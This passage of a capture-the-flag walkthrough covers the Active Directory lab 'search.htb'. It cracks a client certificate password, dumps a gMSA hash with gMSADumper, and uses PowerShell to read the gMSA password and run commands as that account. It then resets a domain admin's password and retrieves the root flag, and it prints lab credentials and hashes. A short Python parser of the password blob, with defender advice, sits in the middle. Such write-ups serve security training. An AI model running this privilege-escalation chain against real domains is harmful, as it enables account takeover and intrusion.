                3246079 blocks of size 4096. 459005 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

We have user flag now.

smb: \sierra.frye\Downloads\Backups\> ls
  .                                 DHc        0  Mon Aug 10 20:39:17 2020
  ..                                DHc        0  Mon Aug 10 20:39:17 2020
  search-RESEARCH-CA.p12             Ac     2643  Fri Jul 31 15:04:11 2020
  staff.pfx                          Ac     4326  Mon Aug 10 20:39:17 2020

                3246079 blocks of size 4096. 458996 blocks available

Under Downloads we find certificate files. Let's download them to our machine.
A .p12 file is a PKCS#12 (Public Key Cryptography Standard #12) container: a password-protected, portable format for bundling a private key with its certificate(s) and other sensitive material. P12 files are used by many security and encryption programs and are commonly referred to as "PFX files".
We can try to import this certificate into the browser (Firefox). It asks for a password, which we can try to crack with the tool below.
GitHub – Ridter/p12tool: A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.

$ ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
[p12tool ASCII-art banner]
Version: 1.0 (n/a) - 01/03/22 - Evi1cg

2022/01/03 02:34:13 -> [*] Brute forcing...
2022/01/03 02:34:13 -> [*] Start thread num 100
2022/01/03 03:01:44 -> [+] Password found ==> misspissy
2022/01/03 03:01:44 -> [*] Successfully cracked password after 5484391 attempts!

On a VM this takes considerably longer. Now we have the certificate password (misspissy); let's import the certificate into the browser. There is a specific endpoint that can only be accessed with this client certificate:

https://search.htb/staff/

Now we enter the credentials of the 'Sierra' user ('$$49=wide=STRAIGHT=jordan=28$$18') and reach a PowerShell console.

After login we can run PowerShell commands.
Let's go back to BloodHound and look for a path from an owned principal to domain admin. As Sierra is a member of ITSEC, we can read a gMSA password: BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account, and the group ITSEC@SEARCH.HTB is allowed to retrieve its password.

$ python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords, so cracking this hash is not realistic. Two references are useful here:
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
Passwordless PowerShell
gMSA attributes in Active Directory:
msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword): stores the security principals that can access the gMSA password.
msds-ManagedPassword: contains a BLOB with the password information for a group managed service account.
msDS-ManagedPasswordId: a constructed attribute holding the key identifier for the current managed password data of a group MSA.
msDS-ManagedPasswordInterval: the number of days before a managed password is automatically changed for a group MSA.
Based on these two references, we can run commands as BIR-ADFS-GMSA and set up an environment that leads to domain admin:
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
With the above we retrieve the gMSA password and wrap it in a credential object, so that subsequent commands can run as the 'BIR-ADFS-GMSA$' user.
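The msDS-ManagedPassword value that the commands above read is a binary MSDS-MANAGEDPASSWORD_BLOB, and the 240-byte figure comes from its layout: a 16-byte header with offsets, then the current (and optionally the previous) password as a null-terminated UTF-16LE string, then two 64-bit intervals in 100-nanosecond units saying when to re-query and how long the current password stays valid. As an added example written for this page (not gMSADumper's or the writeup's code), the Python below serialises a constructed blob and parses it back; the 120-character sample password is printable text for the demo, whereas a real gMSA password is 120 random 16-bit code units. The NT hash that gMSADumper printed is MD4 over those 240 bytes, which is why it cannot be cracked.

```python
import struct

HUNDRED_NS_PER_DAY = 24 * 60 * 60 * 10_000_000   # the blob's intervals are in 100 ns units
HEADER = "<HHIHHHH"                               # Version, Reserved, Length, then four offsets
HEADER_LEN = struct.calcsize(HEADER)             # 16 bytes


def build_blob(current_password, query_interval_days, unchanged_interval_days,
               previous_password=None):
    """Serialise a MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.20). Used here only to construct
    test input; a real blob is what AD returns in the msDS-ManagedPassword attribute."""
    cur = current_password.encode("utf-16-le") + b"\x00\x00"
    prev = previous_password.encode("utf-16-le") + b"\x00\x00" if previous_password else b""
    cur_off = HEADER_LEN
    prev_off = cur_off + len(cur) if prev else 0          # 0 means "no previous password"
    body = cur + prev
    body += b"\x00" * ((-(HEADER_LEN + len(body))) % 8)   # pad so the intervals are 8-byte aligned
    qpi_off = HEADER_LEN + len(body)
    upi_off = qpi_off + 8
    body += struct.pack("<QQ", query_interval_days * HUNDRED_NS_PER_DAY,
                        unchanged_interval_days * HUNDRED_NS_PER_DAY)
    header = struct.pack(HEADER, 1, 0, HEADER_LEN + len(body), cur_off, prev_off, qpi_off, upi_off)
    return header + body


def _read_wstr(blob, off):
    """Read a null-terminated UTF-16LE string starting at byte offset `off`."""
    end = off
    while end + 2 <= len(blob) and blob[end:end + 2] != b"\x00\x00":
        end += 2
    if end + 2 > len(blob):
        raise ValueError("unterminated UTF-16 string in blob")
    return blob[off:end].decode("utf-16-le")


def parse_blob(blob):
    """Decode the blob's fields; the intervals are converted to days."""
    version, _reserved, length, cur_off, prev_off, qpi_off, upi_off = struct.unpack_from(HEADER, blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 managed password blob of the stated length")
    current = _read_wstr(blob, cur_off)
    previous = _read_wstr(blob, prev_off) if prev_off else None
    query_interval = struct.unpack_from("<Q", blob, qpi_off)[0]
    unchanged_interval = struct.unpack_from("<Q", blob, upi_off)[0]
    return {
        "current_password": current,
        "current_password_bytes": len(current.encode("utf-16-le")),
        "previous_password": previous,
        "query_interval_days": query_interval / HUNDRED_NS_PER_DAY,
        "unchanged_interval_days": unchanged_interval / HUNDRED_NS_PER_DAY,
    }


if __name__ == "__main__":
    import secrets
    # Constructed stand-in for a gMSA password: 120 characters, i.e. 240 bytes of UTF-16LE.
    demo = "".join(chr(0x21 + secrets.randbelow(0x7E - 0x21)) for _ in range(120))
    info = parse_blob(build_blob(demo, 30, 30))
    print(f"current password: {info['current_password_bytes']} bytes, "
          f"re-query in {info['query_interval_days']:.0f} days")
```

The part worth internalising as a defender is that the blob is only ever handed out to principals listed in msDS-GroupMSAMembership, so the audit question is not the strength of the password but who is on that list: a broad group such as ITSEC here turns every member into the service account.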

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\Sierra.Frye\Documents> $user = 'BIR-ADFS-GMSA$'
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $blob = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = ConvertFrom-ADManagedPasswordBlob $blob
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
search\bir-adfs-gmsa$
PS C:\Users\Sierra.Frye\Documents>

Everything is set; Invoke-Command with $cred can now run any script block or command as the gMSA. The sequence below ends with the whoami call we use to confirm which user we are running as:

$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

As you can see, 'whoami' reports that we are now the 'BIR-ADFS-GMSA$' user, not 'Sierra'.
Let's look at BloodHound once more and check the help text for 'GenericAll'. 'GenericAll' means full control over the 'Tristan' user, who is also a domain admin. Let's change the domain admin's password.

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}

Now we can access the Administrator directory on C$ and read the root flag.

$ smbclient //search.htb/C$ -U Tristan.Davies
Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> ls
  $RECYCLE.BIN                     DHSc        0  Mon Mar 23 19:24:13 2020
  Config.Msi                       DHSc        0  Thu Dec 16 17:08:46 2021
  Documents and Settings          DHSrn        0  Sun Mar 22 23:46:47 2020
  HelpDesk                           Dc        0  Tue Apr 14 10:24:23 2020
  inetpub                            Dc        0  Mon Mar 23 07:20:20 2020
  pagefile.sys                      AHS 738197504  Mon Jan  3 07:18:09 2022
  PerfLogs                           Dc        0  Thu Jul 30 14:43:39 2020
  Program Files                     DRc        0  Thu Dec 16 17:07:44 2021
  Program Files (x86)                Dc        0  Sat Sep 15 07:21:46 2018
  ProgramData                      DHcn        0  Tue Apr 14 10:24:03 2020
  Recovery                        DHScn        0  Sun Mar 22 23:46:48 2020
  RedirectedFolders                  Dc        0  Mon Jan  3 07:55:00 2022
  System Volume Information         DHS        0  Tue Mar 31 14:13:38 2020
  Users                             DRc        0  Tue Aug 11 07:45:30 2020
  Windows                            Dc        0  Mon Dec 20 08:10:02 2021

                3246079 blocks of size 4096. 534471 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
